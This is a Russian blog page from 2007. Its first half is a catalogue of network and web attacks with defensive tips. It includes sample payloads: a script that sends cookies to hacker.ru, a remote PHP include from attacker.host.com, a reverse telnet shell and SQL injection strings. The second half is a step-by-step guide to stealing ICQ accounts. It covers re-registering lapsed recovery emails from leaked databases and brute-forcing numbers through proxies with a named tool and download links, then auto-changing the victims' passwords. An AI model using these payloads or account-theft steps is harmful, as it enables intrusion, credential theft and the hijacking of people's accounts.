12)  Sniffing (Сниффинг или прослушивание сети). В том случае, если вместо коммутаторов в сети установлены концентраторы, полученные пакеты рассылаются всем компьютерам в сети, а дальше уже компьютеры определяют для них этот пакет или нет. Если взломщик получит доступ к компьютеру, который включен в такую сеть, или получит доступ к сети непосредственно, то вся информация, передаваемая в переделах сегмента сети, включая пароли, станет доступна. Взломщик просто поставит сетевую карту в режим прослушивания и будет принимать все пакеты независимо от того, ему ли они предназначались. Можно использовать как консольные снифферы, например TcpDump (встроенный в *NIX системах), WinDump (для Windows, но не встроенный), а так же с визуализированным интерфейсом, например Iris.

Рекомендации: используйте коммутаторы вместо концентраторов, шифруйте трафик.

13)  IP Hijack (IP хайджек). Если есть физический доступ к сети, то взломщик может «врезаться» в сетевой кабель и выступить в качестве посредника при передаче пакетов, тем самым он будет слушать весь трафик между двумя компьютерами. Очень неудобный способ, который часто себя не оправдывает, за исключением случаев, когда никакой другой способ не может быть реализован. Подобное включение само по себе неудобно, хотя есть устройства, которые немного упрощают эту задачу, в частности они следят за нумерацией пакетов, чтобы избежать сбоя и возможного выявления вторжения в канал. Такой способ используется для обмана банкоматов, но такой случай технически сложнее, потому что недопустим разрыв связи между банком и банкоматом, а «врезание» в канал без его разрыва – задача только для высококвалифицированного специалиста. Кроме этого, теперь банкоматы устанавливаются гораздо лучше, что исключает возможность свободного физического доступа к кабелю.

Рекомендации: следите за доступом к кабелям, например, используйте короба. Шифруйте трафик.

14)  Dummy ARP (Ложный ARP). ARP сервер, маршрутизатор или коммутатор знают какие IP принадлежат MAC адресам (т.е. сетевым картам). При возможности физического доступа к сети, взломщик может подделать ARP ответ и выдать себя за другой компьютер в сети, получив его IP. Тем самым все пакеты, предназначенные тому компьютеру, будет получать он. Это возможно, если тот компьютер выключен, иначе это действие вызовет конфликт IP адресов (в одной сети не могут быть 2 компьютера с одним и тем же IP адресом).

Рекомендации: используйте ПО, которое информирует об изменении MAC адресов у IP, следите за лог-файлами ARP сервера.

15)  Dummy DNS Server (ложный DNS Сервер). Если настройки сети поставлены в автоматический режим, то при включении в сеть, компьютер «спрашивает» (т.е. отправляет широковещательный пакет) кто будет его DNS сервером, к которому он в дальнейшем будет отправлять DNS запросы. При наличии физического доступа к сети, взломщик может перехватить такой широковещательный запрос и ответить, что его компьютер будет DNS сервером. После этого он сможет отправлять обманутую жертву по любому маршруту. Например, жертва хочет пройти на сайт банка и перевести деньги, взломщик может отправить её на свой компьютер, где будет сфабрикована форма ввода пароля. После этого пароль будет принадлежать взломщику. Достаточно сложный способ, потому что взломщику необходимо ответить жертве раньше, чем DNS сервер.

Рекомендации: по возможности ограничьте доступ к сети посторонних.

16)  Fuzzy (Фаззи). Фильтры могут быть настроены на блокировку определённых видов пакетов, например UDP. Взломщик может сфабриковать пакет так, что фильтр не поймет, что этот пакет UDP и не отфильтрует его, и он попадёт по назначению. Таким образом, взломщик может обойти фильтры пакетов. Этот приём очень узкий и предназначен для частных случаев, точнее тех, когда связь не обязательно должна быть двусторонней. Двусторонняя связь будет невозможна в большинстве случаев, т.к. в основном,C:\Documents and Settings\user\Мои документы\Мои рисунки\Смайлики\00301.gif если блокируются входящие пакеты определённого типа на какой-либо порт, то блокируются и исходящие. Получается, что даже если сфабрикованный пакет пройдёт через фильтр (например на порт UDP), то сервер ответит на него пакетом того же типа, т.е. UDP, но при этом он не будет его фабриковать по примеру взломщика. Т.о. этот исходящий пакет будет отфильтрован и не попадёт к взломщику. Как бы там ни было, всё равно стоит обезопасить себя от подобного рода атак.

Рекомендации: обычно новые версии межсетевых экранов предоставляют достаточную защиту против этого приёма.

17)  Puke – взломщик фабрикует ответ ICMP unreachable (ошибка удалённой системы), что спровоцирует клиента на отключение от сервера. Используется скорее как вспомогательное средство, в том случае, если какой-либо клиент должен быть отключён от сервера для проведения атаки.

18)  Fake unreachable – взломщик фабрикует сообщение о том, что пакет не может быть доставлен (unreachable), тем самым заставляет сервер думать, что у клиента сбой и пакеты не доставляются по назначению. Это может спровоцировать сервер отключить клиента. Тоже вспомогательное средство, похоже на №17, только направлен не на клиента, а на сервер.

19)  IP-Spoofing (Спуфинг или Подмена IP адреса). Атакующий подменяет свой реальный IP фиктивным. Это необходимо, если доступ к ресурсу имеют только определённые IP адреса. Взломщику нужно изменить свой реальный IP на «привилегированный» или «доверенный», чтобы получить доступ. Этот способ может быть использован по-другому. После того, как два компьютера установили между собой соединение, проверив пароли, взломщик может вызвать на жертве перегрузку сетевых ресурсов специально сгенерированными пакетами. Тем самым он может перенаправить трафик на себя и таким образом обойти процедуру аутентификации.

Рекомендации: их может быть много, по той причине, что приёмов достаточно много. Но стоит упомянуть, что угрозу снизит (но возможно затруднит легимитивные соединения) уменьшение времени ответного пакета с установленными флагами SYN и ACK, а также увеличить максимальное количество SYN-запросов на установление соединения в очереди (tcp_max_backlog). Так же можно использовать SYN-Cookies.

20)  Host spoofing (Подмена хоста). Очень сложная техника, требующая физического доступа к сети. Каждый компьютер знает маршрутизатор, на который он отправляет все пакеты, которые потом маршрутизатором доставляются по назначению. При смене маршрутизатора каждому компьютеру высылается redirect уведомление, после чего компьютеры начинают посылать пакеты новому маршрутизатору. Взломщик может сфабриковать подобное уведомление и выдать себя за маршрутизатор, таким образом он получит контроль над трафиком в пределах сегмента сети.

Рекомендации: контроль над доступом к сети и момента смены маршрутизатора. Например, можно следить, весь ли прошлый трафик (т.е. старые соединения) «появились» на новом маршрутизаторе.

21)  Подбор пароля. Используется для регистрации в системе путём подбора пароля к учётной записи. Есть два вида: подбор всех возможных комбинаций символов (BruteForce) и подбор по словарю. Первый способ более эффективен, т.к. всё равно найдётся комбинация символов, которую вы ввели с клавиатуры в качестве пароля, но этот способ крайне медленный, особенно если в расчёт принимаются знаки препинания и т.п. Второй способ быстрый, но если вы ввели слово, которого не может быть в словаре, например: «Мой-Новый-Пароль», то подобрать по словарю его будет невозможно. Программ, которые служат для подбора пароля очень много, поэтому мы не думаем, что есть смысл называть какие-либо конкретные. Как правило, программы, ОС и пр. хранят пароли в шифрованном виде, поэтому даже если взломщик получил доступ к файлу, ему придётся расшифровать пароль. Он это может делать сутками на своём домашнем компьютере.

Рекомендации: использовать сложные пароли, лучше со знаками препинания. Ограничьте  количество попыток ввода пароля. Против расшифровки пароля поможет только его сложность.

22)  Back Connect/Pipes/Reverse (Обратный сеанс или Реверс). Это вспомогательный приём, но сам по себе он очень интересный. Например, взломщик не хочет каждый раз выполнять много действий ради одной команды. Он может упростить задачу, используя этот приём. Суть его в том, что взломщик вынуждает атакуемый компьютер подключиться к компьютеру взломщика. Например на атакуемом компьютере можно выполнить команду telnet [ip.адрес.взломщика] [порт]. После этого взломщик, по сути дела получает командную строку (командную оболочку или Шелл/Shell) на атакуемом компьютере.

23)  Software vulnerabilities (Ошибки ПО). Использование ошибок в программном обеспечении. Эффект может быть разный. От получения несущественной информации до получения полного контроля над системой. Атаки через ошибки ПО самые популярные во все времена. Старые ошибки исправляются новыми версиями, но в новых версиях появляются новые ошибки, которые опять могут быть использованы. Дальше мы опишем не виды атак, а приёмы, используемые для атаки на ошибки ПО. Рекомендации: приведём сразу для всех, потому как рекомендация общая - поможет только «безопасно» написанный код программ. По этой теме можно найти большое количество материала в Интернет.

24)  Buffer Overflow (Переполнение буфера). Очень опасный вид атаки, когда запрос формируется так, что он переполняет выделенные ему рамки памяти и команды «вшитые» в запрос попадают в стек, а после выполняются процессором. Это можно сделать как удалённо, так и локально, если взломщик может запустить свою программу на атакуемом компьютере. Это может быть использовано как для выполнения кода на компьютере, так и для поднятия прав. Есть несколько подвидов атак на переполнение буфера. Мы не будем описывать каждый из них, т.к. для объяснения принципа нам придётся привести примеры кода, который будет непонятен людям, незнакомым с программированием. Нижеприведённая классификация принадлежит Андрею Колищаку (andr[at]sandy.ru) и находится в его статье «Атаки на переполнение буфера». Поэтому найти их описание, примеры и рекомендации Вы можете непосредственно в этой статье. Мы же приведём их просто для ознакомления.


a)      Атака “срыв стека”     
b)      Атака “срыв стека” с параметризацией   
c)      Атака “срыв стека” с передачей управления 
d)      Искажение указателей функций   
e)      Атака на указатели функций   
f)        Атака на указатели функций с параметризацией   
g)      Атака на указатели функций с передачей управления 
h)      Искажение таблиц переходов   
i)        Атака на таблицы переходов   
j)        Атака на таблицы переходов с параметризацией    
k)      Атака на таблицы переходов с передачей управления 
l)        Искажение указателей данных   
m)    Атака с искажением указателей данных   
n)      Атака с искажением указателей данных с параметризацией   
o)      Атака с искажением указателей данных с оригинальным кодом.

К вышеприведённой классификации мы бы хотели привести ещё один тип: Integer Overflow (Переполнение целочисленных). За более подробной информацией можно обратиться к статье «Целочисленное переполнение: Атака» и «Целочисленное переполнение: Защита» или «Basic Integer Overflows» от Blexim.

25)  Shatter – Уязвимость Windows систем, которая может быть использована только локально. Очень похожа на переполнение буфера, точнее приводит к тому же самому результату: команды взломщика попадают в стек. Основана на том, что у каждого окна в Windows, у которого есть поле для ввода, есть и максимальная длина вводимого значения. Она устанавливается ещё на стадии разработки программы и для небольших полей может быть равна, например 50. С клавиатуры нельзя ввести количество символов больше 50, но работа окон Windows основана на Messages (Посланиях). Можно легко получить Header (Хидер или Заголовок(особый, предназначенный только для ОС)) поля для ввода и послать SETTEXT (установить текст) сообщение (используя этот хидер) полю для ввода. Сообщение должно сказать, что необходимо установить текст длиною больше 50, соответственно, всё, что будет после 50-го символа, попадёт в стек и будет выполнено процессором. Защиты от этого не существует. Единственная панацея – это процессоры AMD Athlon 64, у которых есть встроенная защита, и они не выполняют команды из стека.

26)  Nuke (WinNuke или Нюк). Сейчас это скорее история. Windows по умолчанию использует протокол NetBIOS для совместной работы с файлами и принтерами в сети. Для этого ОС открывает три TCP порта (137, 138, 139). Реализация этого протокола на старых версиях Windows содержала уязвимость. Суть в том, что можно послать в открытый 139 порт несколько OutOfBand «сообщений» подряд. Система не могла корректно обработать подобные данные и система повисала. Программ для подобных атак было написано немало, но мы упомянем только Shadow Security Scanner, который уже был назван нами ранее, как средство для SSPing.

27)  Cross User Attack (межпользовательская атака). На наш взгляд достаточно неоднозначное название, т.к. не лучшим образом отражает суть атаки, но всё же мы придержимся этого, общеизвестного названия. Squid 2.4 и ISA/2000 позволяют пользователям делить между собой TCP соединения с сервером. Можно спровоцировать с помощью HRS (описана ниже) два ответа от сервера, один из которых будет контролироваться взломщиком и фальсифицирует полученную пользователем информацию.

28)  Атака на CGI. Большинство WWW (Веб) серверов используют скрипты для предоставления пользователям дополнительных услуг или предоставления дополнительных возможностей. Например, почтовые сервера, как mail.ru На многих серверах установлены «самописные» CMS (Content Management System или Системы управления содержимым (сайта)). Программисты далеко не всегда заставляют свои скрипты проверять вводимые пользователем значения, отчего появляются возможности использования таких оплошностей в различных целях. Атака на переполнение буфера также может быть проведена через ошибки CGI скриптов. Например: http://host/cgi-bin/helloworld?type=A*100 (т.е. буква A будет в количестве 100 раз). По адресу http://www.opennet.ru/base/sec/linux_sec_guide.txt.html можно найти отличную статью, во второй части которой описываются проблемы безопасности, которые обычно оставляются без внимания CGI программистами. Многие не являются приёмами взлома, а только помогают взлому, поэтому для написания хорошего кода лучше ознакомиться со статьёй. Рамки нашей статьи не позволяют нам углубиться в тему написания безопасного кода, поэтому скажем только, что нужно, как минимум, фильтровать все служебные символы из получаемых данных.

29)  SQL Injection (SQL иньекция). Если введённые пользователем данные используются в сформированных SQL запросах без проверки, то взломщик может ввести данные, которые позволят ему получить любую информацию из Ваших SQL баз. Например: есть запрос «SELECT login, password FROM members where email=’$email’;» Где $email вводится пользователем в таблице, запрос обрабатывается и результат выводится на страницу. Взломщик может модифицировать данные и ввести в форму: «my@mail.ru' OR login LIKE '%admin%». Таким образом, сформированный SQL запрос будет: «SELECT login, password FROM members where email='my@mail.ru' OR login LIKE '%admin%';». Таким образом, взломщик получит пароли от пользователей, в login которых содержится admin.

30)  HRS (HTTP Resource Splitting) – Достаточно молодой и по нашему мнению сложный приём (если не использовать его только для XSS), который позволяет реализовать атаки вида Hijacking Pages, Cross User Defacement, Web Cache Poisoning, Browser Cache Poisoning, XSS (будут описаны ниже). Сущность атаки в том, что взломщик, специально приготовленным HTTP запросом может заставить Веб-сервер, уязвимый перед HRS, ответить жертве (а не взломщику) двумя раздельными HTTP ответами (а не одним, как это было бы в обычной ситуации). Первый HTTP ответ может быть частично контролируем взломщиком, но второй контролируется взломщиком полностью! Если это возможно, взломщик посылает два запроса, где жертва выступает уже посредником. Первый из этих запросов снова заставит Веб-сервер ответить два раза, а второй обычно запрашивает какой-либо второстепенный ресурс на сервере (например, какую-либо маленькую картинку). Но! Жертва объединит второй HTTP запрос (на второстепенный ресурс) со вторым HTTP ответом (который контролируется взломщиком)! Таким образом, жертва думает, что получившийся «агрегат» это ответ от Веб-сервера с частью его содержимого, но на самом деле это будет важная информация или команда (которая подготовлена взломщиком). Есть ещё один нюанс, жертвой может быть компьютер взломщика, который получит в результате атаки, важную информацию, например, cookie другого пользователя. Ниже мы опишем атаки, которые можно провести через HRS, но они так же могут быть проведены с использованием другого приёма, но мы скажем про них всё же в ключе HRS.

31)  Cross User Defacement – Достаточно «узкий» приём, потому что взломщик подделывает страницу, которая посылается уязвимым Веб – сервером только одной жертве. При этом содержимое Веб – сервера никаким образом не меняется. Кроме этого, приём очень сложно провести не при помощи HRS. Взломщику придётся выступить посредником между клиентом и сервером при помощи Спуфинга, IP хайджека, или ошибки в реализации некоторых Веб-серверов, но в итоге «затраты» не оправдают полученного результата. Более легко реализовать это через межпользовательскую атаку.

32)  Web Cache Poisoning – по нашему мнению, не совсем полезный приём, поэтому опишем его исключительно кратко. В основном, прокси серверы кэшируют страницы, запрашиваемые пользователями, чтобы при повторном запросе такой страницы отдать её из кэша, а не запрашивать Веб-сервер. Это необходимо для экономии трафика, если это корпоративная сеть и прокси сервер внутрисетевой. Суть приёма в том, чтобы спровоцировать прокси сервер кэшировать поддельную страницу, которая потом будет передаваться пользователям сети.

33)  Browser Cache Poisoning. Кэши есть не только у прокси серверов, но также и у браузеров. По сути этот приём почти то же самое, что и Web Cache Poisoning, с той лишь разницей, что ей подвергается только один компьютер.

34)  Hijacking Pages – в некоторой степени этот приём схож с межпользовательской атакой, но здесь цель атаки не «подсунуть» пользователю подделанную информацию, например Веб-страницу, а наоборот, заставить сервер переслать взломщику Веб-страницу, которая предназначалась другому пользователю. Таким образом, взломщик может получить важную информацию, предназначенную другому пользователю. Это может быть номер его счёта или выданный ему пароль. Для проведения атаки, взломщику необходимо TCP соединение с прокси сервером (назовём «ВСП»), TCP соединение между жертвой и прокси сервером («ЖСП») и TCP соединение между Веб-сервером и прокси сервером («ССП»). Схема следующая:


a)      Взломщик посылает через «ВСП» запрос (назовём «ЗА») к прокси серверу, на который Веб-сервер должен ответить двумя «ответами» «ОФ1» и «ОФ2» (случай HRS).
b)      Прокси сервер пересылает через «ССП» запрос «ЗА» к Веб-серверу.
c)      Веб-сервер отвечает «ОФ1» и «ОФ2» через «ССП».
d)      Прокси сервер считает, что «ОФ1» это ответ на «ЗА» и пересылает его взломщику через «ВСП».
e)      Жертва посылает прокси серверу запрос «ЗЖ» через «ЖСП». На который Веб сервер должен ответить страницей «ОС», которая содержит важную информацию.
f)        Прокси сервер пересылает «ЗЖ» Веб-серверу через «ССП», но тут же принимает фальшивый «ОФ2» за ответ Веб-сервера.
g)      Прокси сервер через «ЖСП» пересылает жертве «ОФ2» как ответ на запрос «ЗЖ».
h)      Взломщик снова посылает прокси серверу новый запрос «ЗА2» через «ВСП».
i)        В это время прокси сервер получает ответ от Веб-сервера на «ЗЖ» через «ССП».
j)        При этом прокси сервер всё же пересылает «ЗА2» Веб-серверу через «ССП», но тут же принимает «ОС» за ответ на «ЗА2».
k)      Прокси сервер пересылает «ОС» взломщику через «ВСП». Т.о. взломщик добился своей цели, он получил страницу, которая предназначалась жертве.

Дальше прокси сервер получит ответ на последний запрос взломщика, но на то время эту страницу будет некому отдать, и она будет вероятнее всего удалена. Мы думаем, что после рассмотрения этой схемы стало понятно, что атака не столь сложна в реализации в теории, сколь сложна на практике. Требуется точно распланированное время, через которое будут отосланы запросы и, соответственно, потребуются точные данные, через какое время будут получены ответы на запросы.

35)  CSS/XSS (Cross-Site Scripting или Межсайтовый скриптинг). Атака, так и не признанная Microsoft опасной, основана на использовании Java Script в странице. Как известно, Java код, «вшитый» в страницу, выполняется браузером пользователя. Возможности достаточно ограничены, но в умелых руках имеющиеся возможности могут быть очень эффективно использованы. Например, многие форумы или почтовые сервера умеют идентифицировать пользователя по наличию определённой cookie на компьютере пользователя. Она уникальна для каждого и поэтому считается достаточно безопасно идентифицировать пользователя для доступа к информации малой важности только по её наличию, без ввода пароля. Но, cookie можно украсть! Взломщик может внедрить в страницу код типа: «<script>img = new Image(); img.src=http://hacker.ru/snf.jpg?"+document.cookie;</script>», а на своём сайте создать файл snf.jpg, который на самом деле будет скриптом и будет записывать в файл полученные через document.cookie данные. Таким образом, каждый пользователь, посетивший страницу форума, куда взломщик внедрил вышеприведённый код (например, вместо картинки), «подарит» взломщику свою cookie, которая позже может быть использована взломщиком для регистрации на форуме. Даже если внешние ссылки на картинки не разрешены, но есть возможность их загрузки, то одного фильтра на расширение (чтобы оно было, например JPG) мало. Поэтому атака всё равно будет успешной, если в теле файла (например: «photo.jpg») будет содержаться JAVA код. Если сервер подвержен атаке XSS, то клиент может сам уберечься от неё, отключив выполнение Java Script в своём браузере. Конечно, после этого некоторые страницы могут работать некорректно.

36)  SiXSS (SQL Injection Cross Site Scripting). Представляет собой комбинацию SQL Injection и XSS, т.е. выполнение атаки типа XSS через уязвимость скрипта к SQL Injection. Атака основана на том, что свежие версии MySQL умеют переводить шестнадцатеричные значения (вида 0хХХ) в текст. Например, через SQL запрос можно выяснить, что шестнадцатеричное значение строки «<script>alert("SiXSS");</script>» это «3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E». Теперь если есть уязвимый к SQL Injection Скрипт, то можно задать вот такой запрос: www.victim.com/vuln_script.php?vuln_variable=1+union+select+0x3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E Мы надеемся, что записи vuln_variable или vuln_script Вам понятны, что это уязвимая переменная и уязвимый скрипт соответственно. В результате мы получим окошко с текстом SiXSS, что значит, что атака прошла успешно. Код исключительно безвреден, поэтому можно проверить самим. Подобная атака весьма специфична, поэтому мы считаем необходимым обговорить её более подробно. В отличие от XSS эта атака применяется в фишинге, если её модифицировать. Кроме того, достаточно трудно внедрить подобный код в чужую страницу, потому что «рабочие» скрипты в их шестнадцатеричном значении очень длинные и могут выходить за пределы допустимых значений, поэтому проще привести подобную ссылку отдельно как текст, нежели «вшивать её». Конечно, многие пользователи могут сказать, что они никогда не откроют ссылку, если увидят в ней элементы SQL запроса, например «UNION», однако здесь есть свой подводный камень: от человеческого глаза ссылку легко спрятать, сделать неузнаваемой. Например, запись %F1%F1%FB%EB%EA%E0 совершенно непонятна для глаза, но будет правильно воспринята браузером и сервером. Кроме этого, есть несколько способов замаскировать ссылку, поэтому ошибиться будет легко. Кроме этого, многие почтовые клиенты предпочитают не показывать ссылку целиком, а показывать только начало, поэтому фрагменты SQL могут оказаться попросту скрытыми. Поэтому, либо не доверяйте неизвестным отправителям, даже если они представятся менеджерами банков, либо отключите JAVA. Но первый вариант всё же предпочтительнее. Из личного опыта можно рассказать, что однажды пришло подобное письмо от управляющего банком, где в поле «отправител» была запись «Apex Bank PLC», однако в обратном адресе было apexbnkplcc@yahoo.co.uk Ясно, что это был мошенник, потому что никогда банк не будет доверять обработку своей почты бесплатным почтовым серверам. Внимательно проверяйте обратный адрес и не верьте в легкие деньги!

37)  SiHRS (SQL Injection HTTP Resource Splitting) – приём реализует HTTP Resource Splitting через уязвимость скрипта к SQL Injection. Это становится возможным, если скрипт, например, по индексу, сначала обращается к SQL базе за HTTP адресом, а потом сам генерирует свой HTTP запрос и использует полученный из SQL базы HTTP адрес для подстановки в поле «Location:» своего HTTP запроса. Это достаточно часто используется в Интернет-каталогах сайтов. Мы можем привести пример HTTP заголовка, который может быть использован для SiHRS в шестнадцатеричном виде.


Select HEX('i.php'
Content-Length: 0
 
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
 
<html></html>');

Получится очень длинная строка, поэтому мы приведём только первую её часть «692E7068700A436F6E74656E742D4C656E6774683A20300D0A0D0A485…»

Теперь мы сможем так же использовать полученный результат, как и в случае с SiXSS.

«www.victim.com/vuln_script.php?vuln_variable=1+and+2%3d%34+union+select+0x692E7068700A436F6E74656E742D4C656E6774683A20300D0A0D0A485…»

38)  NULL Byte (или Нулевой байт). Это достаточно серьёзная проблема с языком PERL. Дело в том, что Perl позволяет символу \0 (HTML вариант - %00) быть в любом месте строки. Для языков типа С, этот символ означает конец строки. Вот тут и кроется угроза. Например, есть Perl код: $filename = $query->param('filename').'.dat'; open F, $filename; Конечно, всё будет в порядке, если filename будет введён, например “org”, тогда Perl будет открывать файл org.dat, но если взломщик введёт “/etc/passwd%00”, то Perl попытается открыть файл с именем “/etc/passwd\0.dat”. Так как за открытие файла отвечает функция open, которая, получив этот параметр, воспримет \0 как конец строки и отбросит “.dat” и откроет файл “/etc/passwd”.

39)  Include Bug – Достаточно часто встречающаяся уязвимость. Для упрощения добавления новых страниц на сайт или для других целей в скриптах используется функция include($file); где $file задаётся пользователем, либо указывается в ссылке, например http://victim.com/news.php?file=somefile .После этого, вместо функции include(); будет вставлено содержимое somefile. Достаточно удобно, но если не проверять введённое пользователем значение, то рано или поздно кто-нибудь введёт http://victim.com/news.php?file=/etc/passwd и получит его содержимое.

40)  PHP-Include Bug – на наш взгляд достаточно интересная уязвимость, которая может быть отнесена к подвиду Include Bug, но мы считаем, что стоит выделить её отдельно, потому что целью выступает не получение данных из какого-то файла, а вставка в страницу и последующее выполнение сервером PHP кода. Те, кто знакомы с PHP знают, что фрагменты кода (ограниченные, например, <? … ?> или <?php … ?> ) просто вставляются в Веб-страницу, и при построчной обработке страницы Веб-сервером, они выполняются. Т.о. можно вставить такие куски кода в страницу через PHP Include. Например, в странице есть код include($file); В результате в страницу будет вставлено содержимое файла $file (который задаётся пользователем, как в случае с Include Bug). Взломщик может заранее подготовить файл, который содержит в себе PHP код, который он желает выполнить на уязвимом сервере. После этого он загрузит файл на свой Веб-сервер и введёт запрос http://victim.com/news.php?file=http://attacker.host.com/php_code.php После этого PHP код будет вставлен в уязвимую страницу и выполнен Веб-сервером.

41)  Hidden Fields (или Скрытые поля). Это не приём взлома, скорее, приём манипуляции данными. Скрытые поля используются в формах, которые сначала передаются клиенту, но не отображаются в браузере, а потом отдаются обратно серверу. Они выглядят в исходном коде HTML страницы как: “<input type="hidden" name="price" value="10">”. Проблема в том, что взломщик может изменить это поле вручную, после чего товар будет ему продан в ту цену, в которую он пожелает.

Рекомендации: не доверяйте данным, полученным из скрытых полей.

 (128x128, 71Kb)


Понравилось: 1 пользователю

Аудио-запись: ICQ-2000

Понедельник, 05 Февраля 2007 г. 08:23 + в цитатник
Прослушать Остановить
75 слушали
2 копий

[+ в свой плеер]

 (207x272, 132Kb) ICQ-2000                                                        (365x127, 6Kb)

Cамый простой способ угона ICQ

Понедельник, 05 Февраля 2007 г. 00:26 + в цитатник
 (120x120, 6Kb)

                                                   Ipdbrute биг фак или как угнать асю?


Надоело сидеть на длиннющем кривом слоне? Так в чем проблема утяни себе короткий уин и покажи всему инету на сколько ты крут!
С чего мы начнем? Наверно для тебя уже не секрет что шестизначные уины регились очень давно и тогда при регистрации вписывать мыло (которое кличут праймари) было обязательно. Вот. На это мыло пароль будет приходить всегда Делаем вывод, что у каждого шести и семи-значного уина есть праймари на который ты сорвешь пароль. Вроде понятно, а вроде как вообще ничего не понятно. Так вот, многие (наверное 90% имхо) мыл регились на бесплатных серваках, а там существуют свои правила. Например если ты не пользуешся своим ящиком (например на hotmail.com) больше трех месяцев то твое мыло становится свободным и любой его может зарегить и юзать. Ну и если на это мыло зареген уин, то он и уин будет юзать. Вот так вот и получается...Кто-то забыл о своем мыле (на которое регил свой уин) кто-то вводил несуществующее мыло например eprst@hotmail.com , кто-то ушел в плаванье и не юзал мыло. В общем, оно свободно, ты просто его региш. Потом быстренько бежишь на https://web.icq.com/secure/password/ и высылаешь себе пароль. Вроде все ясно как день, но ты меня спросишь, а откуда я знаю, на какие ящики регились такие-то номера? Я тебе скажу. Хорошие люди собрали и выложили в сеть базы примари. Выглядит так уин - праймари. То есть ты уже знаешь на какое мыло зареген такой то уин. Утянуть эти базы можно тут http://yozhik.xploit.ru/db/. Но, как видишь, базы не маленькие, по 5-10 метров. Поэтому руками проверить все мылы на валидность не получится. Но тебе поможет программа Advanced Maillist Verify скачать и почитать описание можно тут http://www.massmail.ru/amv/ кряк найдешь сам :) С помощью этой программки ты узнаешь, какой майл из твоего списка существует, а какой - нет. Но дело в том, что некоторые мыльные сервера кое-что там изменили у себя, поэтому на хотмыле и помоему мсне эта прога не рулит. В общем это я описал один способ угона уина который становится все менее актуален но до сих пор рулит. Так как люди вумные пишут подобные проги, которые реально все проверяют. Но просят за это деньги.

А сейчас перейдем к самому имхо реальному способу угона аськи! К IPDbrute2/udc2 Pro.
Вот как он выглядит.



1)Threads - Это количество потоков подбора пароля. Че мелочиться? Ставте 100! (хотя реальное число одновременно открытых сокетов в системе - ограничено)
Alive - Количество потоков подбора пасса в данный момент.
2)Password remains Сколько паролей ему еще предстоит проверить.
bad - Это уже проверенные пароли которые попадают в отстой, не валидные они.
good - Это ваш скажем так улов, правильные пароли, то, что вы набрутили!
3)Proxies - Количество прокси-серверов, которые вы заливали, good - рабочии прокси, alive те прокси, что используются в данный момент.
3)Speed pps(Password Per Second)Cколько паролей проверяется в секунду. У меня, как видели 10, в общем чем выше скорость, тем, разумеется, лучше.
В общем с общим видом мы ознакомились а теперь приступим к настройкам.
Надеюсь, брутфорс вы уже скачали? Если нет, то качайте тут http://antichat.ru/soft/IPDbrute2.zip и вам еще понадобится Программа для генерации списков вида UIN;password берем его тут http://antichat.ru/soft/Generator.zip Так теперь создаем у себя на винте папку условно назовем ее "icqhack" в нее кидай генератор и брутфорс. Так. Теперь создаем четыре текстовых документа. Один для проксей (так и называем его "proxy") второй для валидных паролей, назовем его например "zaebis!" туда будут лететь набрученые вами аськи. И третий документ в котором будут генерированные уины (с которого будет реализовываться сканирование) условно назовем его "uinfuck" Четвертый текстовик - назовем его "bad", туда будут сливаться не правильные пароли. И для желающих можно создать еще один документ с паролями (я так делаю всегда) Делаем текстовик, называем его pass и кидаем туда буквально три пароля. И увеличиваем свои шансы в трое, но этим мы уменьшаем диапазон уинов, которые мы должны просканить, но это не важно. Итак, запускаем генератор.



1)Диапазон который будет генерить, у меня стоит по умолчанию, Вы пишите свой.
2)password это по умолчанию. Не забудьте поменять на свой например 1221 и у вас получится
уин;1221
уин;1221
уин;1221 И так далее...То есть Вы будете подбирать уин под пароль 1221.*это пример пароля, юзайте свои* Как думаете, из несколько десятков тысяч уинов, хоть на одном будет стоять такой пароль? Хех конечно, суть улавливаете?!
Это один способ генерации. Но, как Вы заметили, на скрине есть еще циферка три возле надписи словарь. Помните, мы создали документ под названием pass? Вот пишем в него три каких то пароля, больше не надо. Пример 111222 222111 112211 вписали, терь вот что делаем: ставим галочку где написано "словарь"

Как видно из скрина, Вы даете путь на ваш словарь и теперь и после генерации у вас вот что получается:
147852;111222
147852;222111
147852;112211
147853;111222
147853;222111
147853;112211
Фишку поняли? Теперь уин подбирается не к одному паролю, как мы делали выше, а к трем! Но придется сканить меньший диапозон. Поэтому решайте сами... Итак, с генерилкой думаю разобрались, теперь будем настраивать сам брутфорс.
Значит открываем его и нажимаем кнопочку - Config



1)Source uin;pass list file - Путь к текстовому документы куда слились ваши уин;пасс если я не ошибаюсь мы называли его "uinfuck" ну вы поняли :)
2)Threads - Кол-во потоков, о которых мы говорили выше. Ставьте 100
3)Dump incorrect passwords to this file даем путь к текстовику "bad", в который будут сваливаться неправильные пароли.
4)Dump correct passwords to this file - мы его по-моему называли "zaebis" даем на него путь и сюда будут сваливаться ваши честно угнанные уины. Правильные сочетания уин пасс в общем.
5)Proxies list file - Помните, мы создавали текстовик под названием "proxy"? Вот на него и даем путь потому что брутус работает через прокси, иначе мираблы вас забанят.(Совсем забыл сказать в текстовик "proxy" нужно залить прокси. Взять их можно на http://antichat.ru/proxy
6)Cleanup every XX minutes - как вы знаете, прокси умеют умирать и тем самым уменьшать скорость сканирования. Поэтому тут выставляем промежутки времени через которые программа будет "чистить", удалять плохие прокси. Это можно сделать и руками зайдя сюда http://www.ifud.ru/index.php?page=proxies
7) Change password - как только попадется правильное сочетание уин пасса программа автоматически поменяет на нем пароль. Удобно.
Теперь жмем OK и нажимаем start.
Удачного брута!

 (148x62, 7Kb)


Поиск сообщений в StolZZoom
Страницы: [1] Календарь